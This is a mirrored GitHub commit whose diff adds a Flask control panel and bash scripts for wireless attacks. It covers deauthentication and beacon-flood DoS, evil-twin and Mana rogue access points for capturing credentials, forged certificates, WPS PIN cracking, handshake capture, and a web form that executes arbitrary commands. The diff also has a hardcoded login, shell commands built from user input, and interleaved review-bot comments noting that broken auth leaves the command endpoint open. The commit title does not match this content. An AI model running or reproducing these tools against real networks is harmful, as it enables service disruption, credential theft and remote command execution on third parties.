mirror of https://github.com/carlospolop/PEASS-ng synced 2024-11-20 12:39:21 +01:00

Winpeas: More checks & fixes

This commit is contained in:
carlospolop 2020-02-24 00:07:46 +00:00
parent 8477b159e2
commit c657598821
73 changed files with 28090 additions and 151 deletions

linPEAS/linpeas.sh Executable file → Normal file

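--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,3 @@
+{
+"python.pythonPath": "/usr/bin/python3"
+}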


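--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,358 @@
+from flask import Flask, render_template, flash, redirect, url_for, request
+app = Flask(__name__)
+from flask_httpauth import HTTPBasicAuth
+from flask_bootstrap import Bootstrap
+bootstrap = Bootstrap(app)
+from werkzeug.security import generate_password_hash, check_password_hash
+#from app import app
+from app.forms import DoSForm, ClientForm, CreateCertForm, HandshakeCapture, ExecForm, WPSCracking
+from app.utils import *
+import os, glob, signal
+from subprocess import Popen, PIPE
+from time import sleep
+app.config['SECRET_KEY'] = os.urandom(32)
+auth = HTTPBasicAuth()
+users = {
+"hacker": generate_password_hash("wwjuggler"),
+}
+@auth.verify_password
+def verify_password(username, password):
+if username in users:
+return check_password_hash(users.get(username), password)
+return False
+@auth.login_required
+@app.route('/change_wlan_mode/<string:wiface>', methods=['GET'])
+def change_wlan_mode(wiface):
+wlans = get_wlan_interfaces()
+print(wiface)
+if wiface in wlans:
+if wlans[wiface] == "Managed":
+#p = Popen(("iwconfig '"+wiface+"' mode monitor").split(" "), stdout=PIPE, stderr=PIPE)
+p = Popen(("airmon-ng start '"+wiface).split(" "), stdout=PIPE, stderr=PIPE)
+else:
+#p = Popen(("iwconfig '"+wiface+"' mode managed").split(" "), stdout=PIPE, stderr=PIPE)
+p = Popen(("airmon-ng stop '"+wiface).split(" "), stdout=PIPE, stderr=PIPE)
+stdout, stderr = p.communicate()
+if stdout:
+flash(stdout.decode("utf-8"))
+if stderr:
+flash("STDERR: "+stderr.decode("utf-8"))
+return render_template('index.html', wlans=get_wlan_interfaces())
+@app.route('/')
+@app.route('/index')
+@auth.login_required
+def index():
+wlans = get_wlan_interfaces()
+return render_template('index.html', wlans=wlans)
+@auth.login_required
+@app.route('/scan_results')
+def scan_results():
+stations,clients = get_scan_results()
+return render_template('scan_results.html', aps=stations, clients=clients)
+@auth.login_required
+@app.route('/dos', methods=['GET', 'POST'])
+def dos():
+station_macs, essids, clients_macs = get_macs_aps_clients()
+form = DoSForm(request.form)
+form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
+form.essid1.choices = [(e, e) for e in essids]
+form.bssid1.choices = [(b, b) for b in station_macs]
+form.client1.choices = [(c, c) for c in clients_macs]
+if form.validate_on_submit():
+essid = form.essid2.data if form.essid2.data else ( form.essid1.data if form.essid1.data else "")
+bssid = form.bssid2.data if form.bssid2.data else ( form.bssid1.data if form.bssid1.data else "")
+client = form.client2.data if form.client2.data else ( form.client1.data if form.client1.data else "")
+exec_msg = "Executing " + form.option.data + " in interface " + form.interface.data
+cmd = scripts_path+"/DoS.sh -o "+ form.option.data + " -i " + form.interface.data
+if essid:
+exec_msg += ", against ESSID " + essid
+cmd += " -e \"" + essid + "\""
+if bssid:
+exec_msg += ", against BSSID " + bssid
+cmd += " -b " + bssid
+if client:
+exec_msg += ", against Client " + client
+cmd += " -m " + client
+if form.channel.data:
+exec_msg += " in Channel " + str(form.channel.data)
+cmd += " -c " + str(form.channel.data)
+if form.fake_essids.data:
+exec_msg += " anouncing fake ESSIDS ("+form.fake_essids.data+")"
+cmd += " -f \"" + form.fake_essids.data + "\""
+if form.time.data:
+exec_msg += " during " + str(form.time.data) + "s"
+cmd += " -t " + str(form.time.data)
+else:
+exec_msg += " indefinitely"
+if form.stealth.data:
+exec_msg += " and stealthy"
+cmd += " -s"
+flash(exec_msg)
+outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
+errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
+my_execute(cmd, outfile, errfile, True)
+return redirect(url_for('console'))
+return render_template('form.html', formtype="DoS Attack", form=form)
+@auth.login_required
+@app.route('/client', methods=['GET', 'POST'])
+def client():
+station_macs, essids, clients_macs = get_macs_aps_clients()
+form = ClientForm(request.form)
+form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
+form.essid_whitelist.choices = [(e, e) for e in essids]
+form.essid_blacklist.choices = [(e, e) for e in essids]
+form.mac_whitelist.choices = [(c, c) for c in clients_macs]
+form.mac_blacklist.choices = [(c, c) for c in clients_macs]
+if form.validate_on_submit():
+essid = form.essid2.data if form.essid2.data else ( form.essid1.data if form.essid1.data else "")
+exec_msg = "Executing " + form.option.data + " in interface " + form.interface.data + " using as authentication "+form.auth.data
+cmd = scripts_path+"/Client.sh -o "+ form.option.data + " -i " + form.interface.data + " -a " + form.auth.data
+if form.wpa_version.data:
+exec_msg += "(" + form.wpa_version.data +")"
+cmd += " -w " + form.wpa_version.data
+if essid:
+exec_msg += ", as ESSID " + essid
+cmd += " -e " + essid
+if form.bssid.data:
+exec_msg += ", as BSSID " + form.bssid.data
+cmd += " -e " + essid
+if form.channel.data:
+exec_msg += " in Channel " + str(form.channel.data)
+cmd += " -c " + str(form.channel.data)
+if form.loud.data:
+exec_msg += " (Loud mode)"
+cmd += " -l"
+if form.known_beacons.data:
+exec_msg += " - Known Beacons declared"
+cmd += " -k " + ",".join(form.known_beacons.data)
+if form.mac_whitelist.data:
+exec_msg += " - Mac Whitelist declared"
+cmd += " -p " + ",".join(form.mac_whitelist.data)
+if form.mac_blacklist.data:
+exec_msg += " - Mac Blacklist declared"
+cmd += " -v " + ",".join(form.mac_blacklist.data)
+if form.essid_whitelist.data:
+exec_msg += " - ESSID Whitelist declared"
+cmd += " -n " + ",".join(form.essid_whitelist.data)
+if form.essid_blacklist.data:
+exec_msg += " - ESSID Blacklist declared"
+cmd += " -m " + ",".join(form.essid_blacklist.data)
+flash(exec_msg)
+outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
+errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
+my_execute(cmd.split(" "), outfile, errfile)
+return redirect(url_for('console'))
+return render_template('form.html', formtype="Client Attack", form=form)
+@auth.login_required
+@app.route('/create_cert', methods=['GET', 'POST'])
+def create_cert():
+form = CreateCertForm(request.form)
+if form.validate_on_submit():
+exec_msg = "Creating certificate with CC: "+form.cc.data+", State:"+form.state.data+", City: "+form.city.data+", Organization: "+form.organization.data+", Department: "+form.department.data+", Email"+form.email.data+", CN:"+form.cn.data
+cmd = scripts_path+"/Create_cert.sh '{}' '{}' '{}' '{}' '{}' '{}' '{}'".format(form.cc.data, form.state.data, form.city.data, form.organization.data, form.department.data, form.email.data, form.cn.data)
+flash(exec_msg)
+outfile = current_store_path+"/create_cert"+str(count_ps)+".out"
+errfile = current_store_path+"/create_cert"+str(count_ps)+".err"
+my_execute(cmd, outfile, errfile, True)
+return redirect(url_for('console'))
+return render_template('form.html', formtype="Create EAP Certificate", form=form)
+@auth.login_required
+@app.route('/wps_cracking', methods=['GET', 'POST'])
+def wps_cracking():
+station_macs, essids, clients_macs = get_macs_aps_clients()
+form = WPSCracking(request.form)
+form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
+form.bssid.choices = [(b, b) for b in station_macs]
+if form.validate_on_submit():
+exec_msg = "WPS cracking with option "+form.option.data+" against BSSID "+form.bssid.data+" in channel "+str(form.channel.data)
+cmd = scripts_path+"/WPS.sh -t {} -i '{}' -b '{}' -c '{}' -o '{}'".format(form.tool.data, form.interface.data, form.bssid.data, form.channel.data, form.option.data)
+if form.ignore_locks.data:
+exec_msg += "(ignore LOCK)"
+cmd += " -l"
+if form.pin.data:
+exec_msg += ", PIN: "+str(form.pin.data)
+cmd += " -p "+str(form.pin.data)
+if form.option.data == "nullpin":
+cmd.replace("bully", "reaver")
+flash(exec_msg)
+outfile = current_store_path+"/"+form.interface.data+"-"+str(count_ps)+".out"
+errfile = current_store_path+"/"+form.interface.data+"-"+str(count_ps)+".err"
+my_execute(cmd, outfile, errfile, True)
+return redirect(url_for('console'))
+return render_template('form.html', formtype="WPS Cracking", form=form)
+@auth.login_required
+@app.route('/capture_handshake', methods=['GET', 'POST'])
+def capture_handshake():
+station_macs, essids, clients_macs = get_macs_aps_clients()
+form = HandshakeCapture(request.form)
+form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
+form.bssid.choices = [(b, b) for b in station_macs]
+if form.validate_on_submit():
+exec_msg = "Capturing handshakes using interface " + form.interface.data + " of bssid " + form.bssid.data + " in channel "+str(form.channel.data)
+cmd = scripts_path+"/Capture_handshakes.sh " + form.interface.data + " " +str(form.channel.data) + " " + form.bssid.data + " " + current_store_path + "/psk"
+flash(exec_msg)
+outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
+errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
+my_execute(cmd.split(" "), outfile, errfile)
+return redirect(url_for('console'))
+return render_template('form.html', formtype="Capture Handshakes", form=form)
+@auth.login_required
+@app.route('/execute', methods=['GET', 'POST'])
+def execute():
+form = ExecForm()
+if form.validate_on_submit():
+exec_msg = "Going to execute: " + form.cmd.data
+flash(exec_msg)
+outfile = current_store_path+"/execute"+str(count_ps)+".out"
+errfile = current_store_path+"/execute"+str(count_ps)+".err"
+my_execute(form.cmd.data , outfile, errfile, True)
+sleep(1)#So when you gets to console the command is probably executed already
+return redirect(url_for('console'))
+return render_template('form.html', formtype="Execute", form=form)
+@auth.login_required
+@app.route('/console')
+def console():
+procs = get_procs()
+return render_template('console.html', procs=procs)
+@auth.login_required
+@app.route('/kill/<string:file_name>', methods=['GET'])
+def kill(file_name):
+global executing_procs
+procs = get_procs()
+if ".err" in file_name:
+file_name=file_name.replace(".err",".out")
+if file_name in executing_procs and any([p["terminated"] == "Running" for p in procs if p["name"] == file_name]): #Check that the process is still running
+pid = executing_procs[file_name].pid
+try:
+if not "mana" in file_name and not "evil_twin" in file_name:
+os.killpg(pid, signal.SIGTERM)
+else:
+executing_procs[file_name].communicate(input=b"\n")
+sleep(4)
+flash("Process terminated ("+file_name.split(".")[0]+") with PID "+str(pid)+".")
+except Exception as e:
+print(e)
+#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".out"):
+# os.remove(current_store_path+"/"+file_name.split(".")[0]+".out")
+#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".err"):
+# os.remove(current_store_path+"/"+file_name.split(".")[0]+".err")
+return redirect(url_for('console'))
+@auth.login_required
+@app.route('/killall', methods=['GET'])
+def killall():
+global executing_procs
+procs = get_procs()
+for file_name in executing_procs:
+if any([p["terminated"] == "Running" for p in procs if p["name"] == file_name]): #Check that the process is still running
+pid = executing_procs[file_name].pid
+try:
+if not "mana" in file_name and not "evil_twin" in file_name:
+os.killpg(pid, signal.SIGTERM)
+else:
+executing_procs[file_name].communicate(input=b"\n")
+sleep(4)
+flash("Process terminated ("+file_name.split(".")[0]+") with PID "+str(pid)+".")
+except:
+pass
+#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".out"):
+# os.remove(current_store_path+"/"+file_name.split(".")[0]+".out")
+#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".err"):
+# os.remove(current_store_path+"/"+file_name.split(".")[0]+".err")
+executing_procs = {}
+return redirect(url_for('console'))
+@auth.login_required
+@app.route('/restart_airodump', methods=['POST'])
+def restart_airodump():
+restart_airo()
+return redirect(url_for('index'))
+@auth.login_required
+@app.route('/reboot', methods=['POST'])
+def reboot():
+os.system("reboot")
+##################################################
+################ INITIAL ACTIONS #################
+##################################################
+#clean_exec_procs_dir() #Start cleaning other executions
+if not os.path.exists(store_path): #Create main dir if it doesn't exit (1st run)
+os.mkdir(store_path)
+if not os.path.exists(current_store_path): #Create main dir if it doesn't exit (1st run)
+os.mkdir(current_store_path)
+if not os.path.exists(store_airodump): #Create main dir if it doesn't exit (1st run)
+os.mkdir(store_airodump)
+sleep(0.5)
+restart_airo() #"Restart" any airodump to capture packets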
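Review bot: `@auth.login_required` is stacked above `@app.route` on every handler except `index` (change_wlan_mode, scan_results, dos, client, create_cert, wps_cracking, capture_handshake, execute, console, kill, killall, restart_airodump, reboot); in that order `app.route` registers the still-unwrapped function as the view, so the HTTP Basic check never runs on those routes, including `/execute`, `/kill`, `/killall` and `/reboot`, while `index` shows the working order. Put the route decorator outermost on each of them, e.g. `@app.route('/execute', methods=['GET', 'POST'])` then `@auth.login_required` then `def execute():`. Two smaller defects in the same hunk: `client()` appends `" -e " + essid` inside its `if form.bssid.data:` branch where `" -b " + form.bssid.data` is evidently intended, and `wps_cracking()` discards the result of `cmd.replace("bully", "reaver")` since `str.replace` returns a new string. The single entry in `users` embeds the password in source; reading it from an environment variable or config file at startup would keep the credential out of the repository.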

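--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,79 @@
+from flask_wtf import FlaskForm
+from wtforms import StringField, SelectField, IntegerField, BooleanField, SubmitField, PasswordField, TextAreaField, validators, SelectMultipleField
+from wtforms.validators import DataRequired
+class DoSForm(FlaskForm):
+option = SelectField(u'DoS Attacks', choices=[('deauth_mdk4', 'MDK4 Deauth'), ('deauth_aireplay', 'Aireplay Deauth'), ('WIDS_confusion', 'WIDS Confusion'), ('fake_aps', 'Fake APs'), ('reinject_data', 'DoS AP reinjecting data'), ('EAPOL_DoS', 'EAPOL_DoS'), ('TKIP_DoS', 'TKIP_DoS')], validators=[DataRequired()])
+interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
+essid1 = SelectField(u'ESSID1', choices=[], validators=(validators.Optional(),))
+essid2 = StringField(u'ESSID2', validators=(validators.Optional(),))
+bssid1 = SelectField(u'BSSID1', choices=[], validators=(validators.Optional(),))
+bssid2 = StringField(u'BSSID2', [
+validators.Optional(),
+validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
+validators.Length(min=17, max=17, message="BSSID must be 17 chars length: 45:D2:28:33:B7:2D")
+])
+client1 = SelectField(u'Client1', choices=[], validators=(validators.Optional(),))
+client2 = StringField(u'Client2', [
+validators.Optional(),
+validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
+validators.Length(min=17, max=17, message="Client MAC must be 17 chars length: 45:D2:28:33:B7:2D")
+])
+fake_essids = StringField(u'Fake essids', validators=(validators.Optional(),))
+time = IntegerField(u'Time', validators=(validators.Optional(),))
+channel = IntegerField(u'Channel', validators=(validators.Optional(),))
+stealth = BooleanField(u'Stealth')
+submit = SubmitField(u'Attack')
+class ClientForm(FlaskForm):
+option = SelectField(u'Client Attack', choices=[('evil_twin', 'Evil Twin'), ('mana', 'Mana')], validators=[DataRequired()])
+interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
+auth = SelectField(u'Auth method', choices=[("open","open"),("wpa-psk","wpa-psk"),("wpa-eap","wpa-eap"),("owe","owe"),("owe-transition","owe-transition"),("owe-psk","owe-psk")], validators=[DataRequired()])
+essid1 = SelectField(u'ESSID1', choices=[], validators=(validators.Optional(),))
+essid2 = StringField(u'ESSID2', validators=(validators.Optional(),))
+bssid = StringField(u'BSSID', [
+validators.Optional(),
+validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
+validators.Length(min=17, max=17, message="BSSID must be 17 chars length: 45:D2:28:33:B7:2D")
+], default="74:D0:2B:90:56:F2")
+wpa_version = SelectField(u'WPA version', choices=[("2","2"),("1","1")], validators=(validators.Optional(),))
+channel = IntegerField(u'Channel', validators=(validators.Optional(),))
+loud = BooleanField(u'Loud')
+known_beacons = StringField(u'Known Beacons', validators=(validators.Optional(),))
+mac_whitelist = SelectMultipleField(u'Mac Whitelist', choices=[], validators=(validators.Optional(),))
+mac_blacklist = SelectMultipleField(u'Mac Blacklist', choices=[], validators=(validators.Optional(),))
+essid_whitelist = SelectMultipleField(u'ESSID Whitelist', choices=[], validators=(validators.Optional(),))
+essid_blacklist = SelectMultipleField(u'ESSID Blacklist', choices=[], validators=(validators.Optional(),))
+submit = SubmitField(u'Attack')
+class CreateCertForm(FlaskForm):
+cc = StringField(u'Please enter two letter country code for certs (i.e. US, FR)', default="US", validators=[DataRequired()])
+state = StringField(u'Please enter state or province for certs (i.e. Ontario, New Jersey)', default="California", validators=[DataRequired()])
+city = StringField(u'Please enter locale for certs (i.e. London, Hong Kong)', default="Los Angeles", validators=[DataRequired()])
+organization = StringField(u'Please enter organization for certs (i.e. Evil Corp)', default="Microsoft", validators=[DataRequired()])
+department = StringField(u'Please enter org unit for certs (i.e. Hooman Resource Says)', default="Human Resources", validators=[DataRequired()])
+email = StringField(u'Please enter email for certs (i.e. cyberz@h4x0r.lulz)', default="humanresources@microsoft.com", validators=[DataRequired()])
+cn = StringField(u'Please enter common name (CN) for certs.', default="microsoft.com", validators=[DataRequired()])
+submit = SubmitField(u'Create')
+class HandshakeCapture(FlaskForm):
+option = SelectField(u'', choices=[("airodump","Airodump-ng")], validators=[DataRequired()])
+interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
+bssid = SelectField(u'BSSID', choices=[], validators=(validators.Optional(),))
+channel = IntegerField(u'Channel', validators=[DataRequired()])
+submit = SubmitField(u'Capture')
+class ExecForm(FlaskForm):
+cmd = StringField(u'Command line to execute', default="whoami", validators=[DataRequired()])
+submit = SubmitField(u'Execute')
+class WPSCracking(FlaskForm):
+option = SelectField(u'Option', choices=[("custompin", "Custom PIN"), ("nullpin", "Null PIN"), ("pixiedust", "Pixiedust"), ("bruteforce_wps", "Brute-Force")], validators=[DataRequired()])
+tool = SelectField(u'Tool', choices=[("reaver", "reaver"), ("bully", "bully")], validators=[DataRequired()])
+interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
+bssid = SelectField(u'BSSID', choices=[], validators=(validators.Optional(),))
+channel = IntegerField(u'Channel', validators=[DataRequired()])
+pin = IntegerField(u'Pin', validators=(validators.Optional(),))
+ignore_locks = BooleanField(u'Ignore Locks', default=True)
+submit = SubmitField(u'Crack')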
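Review bot: The `Regexp` validators on `DoSForm.bssid2`, `DoSForm.client2` and `ClientForm.bssid` all carry the message "Username must contain only letters numbers or underscore", which was evidently copied from another form and tells the user nothing about the MAC format being checked, while the `Length` validator next to each already has the right wording. The same six-octet pattern is written out three times; hoisting it to a module constant, e.g. `MAC_RE = r'^([\da-fA-F]{2}:){5}[\da-fA-F]{2}$'` used as `validators.Regexp(MAC_RE, message="Must be a MAC address like 45:D2:28:33:B7:2D")`, fixes the message and keeps the three fields in sync. The `default="74:D0:2B:90:56:F2"` on `ClientForm.bssid` also reads like a leftover test value rather than something a user should submit unchanged.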

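--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,5 @@
+#!/bin/bash
+echo "Executing: airodump-ng $1 -c \"$2\" --bssid \"$3\" -w \"$4\""
+airodump-ng "$1" -c "$2" --bssid "$3" -w "$4" --output-format pcap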
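Review bot: The script forwards `$1`–`$4` without checking that all four were supplied, so a short call runs `airodump-ng` with empty `-c`/`--bssid`/`-w` values and the only diagnostic comes from airodump-ng itself. A one-line guard before the echo, `[ $# -eq 4 ] || { echo "usage: $0 INTERFACE CHANNEL BSSID OUTPUT_PREFIX" >&2; exit 1; }`, makes the failure explicit. Note also that the Flask caller in this commit splits the command line on single spaces before execution, so an interface name or output prefix containing a space would never reach this script intact even though the script itself quotes its arguments correctly.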

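--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,107 @@
+#!/bin/bash
+INTERFACE=""
+ESSID=""
+BSSID=""
+AUTH=""
+WPA_VERSION=""
+KNOWN_BEACONS=""
+MAC_WHITELIST=""
+MAC_BLACKLIST=""
+OPTION=""
+LOUD=""
+CHANNEL=""
+while getopts "i:e:b:a:w:k:p:v:o:c:l" opt; do
+case "$opt" in
+i) INTERFACE=$OPTARG;;
+e) ESSID=$OPTARG;;
+b) BSSID=$OPTARG;;
+a) AUTH=$OPTARG;;
+w) WPA_VERSION=$OPTARG;;
+k) KNOWN_BEACONS=$OPTARG;;
+p) MAC_WHITELIST=$OPTARG;;
+v) MAC_BLACKLIST=$OPTARG;;
+o) OPTION=$OPTARG;;
+c) CHANNEL=$OPTARG;;
+l) LOUD="1";; #Used to no broadcast deauthentication packets, only useful with mdk4
+esac
+done
+evil_twin(){
+# REQUREMENTS: INTERFACE, ESSID and AUTH
+CMD="eaphammer -i $INTERFACE --essid $ESSID --auth $AUTH"
+if [ "$AUTH" = "open" ]; then
+CMD="$CMD --captive-portal"
+elif [ "$AUTH" = "wpa-psk" ] || [ "$AUTH" = "wpa-eap" ]; then
+if [ "$WPA_VERSION" ]; then
+CMD="$CMD --wpa-version $WPA_VERSION --creds"
+fi
+else
+CMD="$CMD --creds"
+fi
+if [ "$CHANNEL" ]; then
+CMD="$CMD --channel $CHANNEL"
+fi
+if [ "$MAC_WHITELIST" ]; then
+TEMPFILEWHITE="/tmp/white$RANDOM"
+echo "$MAC_WHITELIST" | sed "s/,/\n/g" > $TEMPFILEWHITE
+CMD="$CMD ---mac-whitelist $TEMPFILEWHITE"
+fi
+if [ "$MAC_BLACKLIST" ]; then
+TEMPFILEBLACK="/tmp/black$RANDOM"
+echo "$TEMPFILEBLACK" | sed "s/,/\n/g" > $TEMPFILEBLACK
+CMD="$CMD ---mac-blacklist $TEMPFILEWHITE"
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+mana(){
+# REQUREMENTS: INTERFACE, ESSID and AUTH
+CMD="eaphammer -i $INTERFACE --auth $AUTH --cloaking full --mana"
+if [ "$AUTH" = "open" ]; then
+CMD="$CMD --captive-portal"
+else
+CMD="$CMD --creds"
+fi
+if [ "$LOUD" ]; then
+CMD="$CMD --loud"
+fi
+if [ "$MAC_WHITELIST" ]; then
+TEMPFILEWHITE="/tmp/white$RANDOM"
+echo "$MAC_WHITELIST" | sed "s/,/\n/g" > $TEMPFILEWHITE
+CMD="$CMD ---mac-whitelist $TEMPFILEWHITE"
+fi
+if [ "$MAC_BLACKLIST" ]; then
+TEMPFILEBLACK="/tmp/black$RANDOM"
+echo "$TEMPFILEBLACK" | sed "s/,/\n/g" > $TEMPFILEBLACK
+CMD="$CMD ---mac-blacklist $TEMPFILEWHITE"
+fi
+if [ "$KNOWN_BEACONS" ]; then
+TEMPFILE="/tmp/beacons$RANDOM"
+echo "$KNOWN_BEACONS" | sed "s/,/\n/g" > $TEMPFILE
+CMD="$CMD --known-beacons --known-ssids-file $TEMPFILE"
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+if [ "$OPTION" == "evil_twin" ]; then
+evil_twin
+elif [ "$OPTION" == "mana" ]; then
+mana
+fi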
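Review bot: The `MAC_BLACKLIST` branch in both `evil_twin` and `mana` is broken: it writes the temp file's own name into the file (`echo "$TEMPFILEBLACK" | sed ... > $TEMPFILEBLACK`) instead of `$MAC_BLACKLIST`, and then passes `$TEMPFILEWHITE` — unset whenever no whitelist was given — to the blacklist option. The intended lines are `echo "$MAC_BLACKLIST" | sed "s/,/\n/g" > "$TEMPFILEBLACK"` and `CMD="$CMD --mac-blacklist $TEMPFILEBLACK"`; the triple dash on both `---mac-whitelist` and `---mac-blacklist` also looks like a typo for the two-dash option and is worth checking against eaphammer's help. The `/tmp/white$RANDOM`-style names are predictable and created without `mktemp`, so another local user on the host could pre-create or swap them before the write; `TEMPFILEBLACK="$(mktemp /tmp/black.XXXXXX)"` avoids that, and the files are never removed after eaphammer exits.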

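--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,5 @@
+#!/bin/bash
+echo "Executing: echo -e \"$1\n$2\n$3\n$4\n$5\n$6\n$7\" | eaphammer --cert-wizard interactive"
+echo -e "$1\n$2\n$3\n$4\n$5\n$6\n$7" | eaphammer --cert-wizard interactive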

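--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,209 @@
+#!/bin/bash
+INTERFACE=""
+ESSID=""
+BSSID=""
+MAC_CLIENT=""
+TIME=""
+OPTION=""
+CHANNEL=""
+STEALTH=""
+FAKE_ESSIDS=""
+while getopts "i:e:b:m:c:t:o:f:s" opt; do
+case "$opt" in
+i) INTERFACE=$OPTARG;;
+e) ESSID=$OPTARG;;
+b) BSSID=$OPTARG;;
+m) MAC_CLIENT=$OPTARG;;
+c) CHANNEL=$OPTARG;;
+t) TIME=$OPTARG;;
+o) OPTION=$OPTARG;;
+f) FAKE_ESSIDS=$OPTARG;;
+s) STEALTH="1";; #Used to no broadcast deauthentication packets, only useful with mdk4
+esac
+done
+deauth_aireplay(){
+# REQUREMENTS: INTERFACE and (ESSID or BSSID)
+# Working mode:
+# Cannot perform hole automatic deauth of everything found
+# If only ESSID is given, broadcast desauth will be launch to the found BSSID using the given ESSID
+# If only the BSSID is given, broadcast desauth is launched
+# In this case Stealth flag doesn't do nothing as aireplay do not support it
+CMD="aireplay-ng -0 0"
+if [ "$ESSID" ]; then
+CMD="$CMD -e $ESSID"
+fi
+if [ "$BSSID" ]; then
+CMD="$CMD -a $BSSID"
+fi
+if [ "$MAC_CLIENT" ]; then
+CMD="$CMD -c $MAC_CLIENT"
+fi
+if [ "$TIME" ]; then
+CMD="timeout $TIME $CMD"
+fi
+CMD="$CMD $INTERFACE"
+echo Going to execute $CMD
+$CMD
+}
+deauth_mdk4(){
+# REQUREMENTS: INTERFACE
+# Working mode:
+# Can perform hole automatic deauth of everything found
+# If Stealth is used, no broadcast packet is sent
+CMD="mdk4 $INTERFACE d"
+if [ "$ESSID" ]; then
+CMD="$CMD -E $ESSID"
+fi
+if [ "$BSSID" ]; then
+CMD="$CMD -B $BSSID"
+fi
+if [ "$MAC_CLIENT" ]; then
+TEMPFILE="/tmp/victim$RANDOM"
+echo "$MAC_CLIENT" > $TEMPFILE
+CMD="$CMD -b $TEMPFILE"
+fi
+if [ "$TIME" ]; then
+CMD="timeout $TIME $CMD"
+fi
+if [ "$CHANNEL" ]; then
+CMD="$CMD -c $CHANNEL"
+fi
+if [ "$STEALTH" ]; then
+CMD="$CMD -x"
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+fake_aps(){
+# REQUREMENTS: INTERFACE
+# Working mode:
+# Will send fake beacons of APs, if stealth mode is used, nonprintable chars and long names will be sent.
+CMD="mdk4 $INTERFACE b -w nwta -m"
+if [ "$TIME" ]; then
+CMD="timeout $TIME $CMD"
+fi
+if [ "$CHANNEL" ]; then
+CMD="$CMD -h -c $CHANNEL"
+fi
+if [ "$FAKE_ESSIDS" ]; then
+TEMPFILE="/tmp/essids$RANDOM"
+echo "$FAKE_ESSIDS" | sed "s/,/\n/g" > $TEMPFILE
+CMD="$CMD -f $TEMPFILE"
+else
+if ! [ "$STEALTH" ]; then
+CMD="$CMD -a"
+fi
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+reinject_data(){
+# REQUREMENTS: INTERFACE and BSSID
+# Working mode: (Stealth and not stealth could be combined)
+# If stealth, capture and repeat packets from authenticated clients, else send random data from random clients.
+CMD="mdk4 $INTERFACE a -m"
+if [ "$TIME" ]; then
+CMD="timeout $TIME $CMD"
+fi
+if [ "$STEALTH" ]; then
+CMD="$CMD -i $BSSID"
+else
+CMD="$CMD -a $BSSID"
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+TKIP_DoS(){
+# REQUREMENTS: INTERFACE and a WPA/TKIP AP
+# Working mode: (Stealth and not stealth could be combined)
+# If stealth, use intelligent replay
+CMD="mdk4 $INTERFACE m"
+if [ "$TIME" ]; then
+CMD="timeout $TIME $CMD"
+fi
+if [ "$BSSID" ]; then
+CMD="$CMD -t $BSSID"
+fi
+if [ "$STEALTH" ]; then
+CMD="$CMD -j"
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+EAPOL_DoS(){
+# REQUREMENTS: INTERFACE and a EAP AP
+# Working mode: (Stealth and not stealth could be combined)
+# If stealth, use Logoff messages to kick clients
+CMD="mdk4 $INTERFACE e"
+if [ "$TIME" ]; then
+CMD="timeout $TIME $CMD"
+fi
+if [ "$BSSID" ]; then
+CMD="$CMD -t $BSSID"
+fi
+if [ "$STEALTH" ]; then
+CMD="$CMD -l"
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+WIDS_confusion(){
+# REQUREMENTS: INTERFACE and BSSID/ESSID
+# Working mode: (Stealth and not stealth could be combined)
+# If no stealth, activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
+CMD="mdk4 $INTERFACE w"
+if [ "$TIME" ]; then
+CMD="timeout $TIME $CMD"
+fi
+if [ "$BSSID" ]; then
+CMD="$CMD -e $BSSID"
+elif [ "$ESSID" ]; then
+CMD="$CMD -e $ESSID"
+fi
+if ! [ "$STEALTH" ]; then
+CMD="$CMD -z"
+fi
+echo "Going to execute $CMD"
+$CMD
+}
+if [ "$OPTION" == "deauth_aireplay" ]; then
+deauth_aireplay
+elif [ "$OPTION" == "deauth_mdk4" ]; then
+deauth_mdk4
+elif [ "$OPTION" == "fake_aps" ]; then
+fake_aps
+elif [ "$OPTION" == "reinject_data" ]; then
+reinject_data
+elif [ "$OPTION" == "TKIP_DoS" ]; then
+TKIP_DoS
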